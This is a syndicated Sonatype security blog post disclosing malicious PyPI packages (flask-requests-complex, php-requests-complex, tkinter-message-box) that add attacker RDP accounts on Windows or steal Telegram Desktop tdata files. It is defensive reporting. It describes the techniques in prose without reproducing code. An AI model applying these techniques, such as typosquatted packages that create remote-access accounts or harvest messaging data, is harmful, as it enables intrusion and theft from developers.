SBN

PyPI Packages Steal Telegram Cache Files, Add Windows Remote Desktop Accounts

This week Sonatype has discovered multiple malicious PyPI packages that either set up new Remote Desktop user accounts on your Windows computer or steal encrypted Telegram data files from your Telegram Desktop client.

These packages were discovered by Sonatype’s automated malware detection system, offered as a part of Nexus platform products, including Nexus Firewall. On a further review, we deemed these packages malicious and reported them to PyPI.

The primary packages of interest are:

  • flask-requests-complex
  • php-requests-complex
  • tkinter-message-box

Create Remote Desktop Access Accounts on Windows

Both packages ‘flask-requests-complex’ and ‘php-requests-complex’ contain no description but are certainly named after the popular ‘requests’ module.

Both of these packages contain code that adds a new, attacker-created user account to the “Remote Desktop Users” group on Windows allowing attackers to RDP into the system at will.

Additionally, the packages were seen making a simple HTTP request to a third-party URL to likely notify the threat actor that the attack was successful.

Steals Telegram ‘tdata’ Cache & Settings Files

The ‘tkinter-message-box’ package is yet another example of a malicious package named after ‘tkinter’, Python’s standard interface for a GUI toolkit, that comes without a valid description:

But ‘tkinter-message-box’ contains no UI-related code or a message box utility. Instead, it attempts to locate where your Telegram Desktop client stores its ‘tdata’ files:

‘tdata’ files are purported to be encrypted files generated by the Telegram Desktop client to store settings and cache. Although it is unlikely for cache files to contain entire chat histories, they may contain JPG images, videos and other media exchanged via the Telegram app that may temporarily remain on the device.

All of these packages were published by the same PyPI account ‘ternaryternary’ that’s published seven packages in total thus far, nearly all of which seem suspicious.

Some packages, such as ‘bs4tools (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/pypi-packages-steal-telegram-cache-files-add-windows-remote-desktop-accounts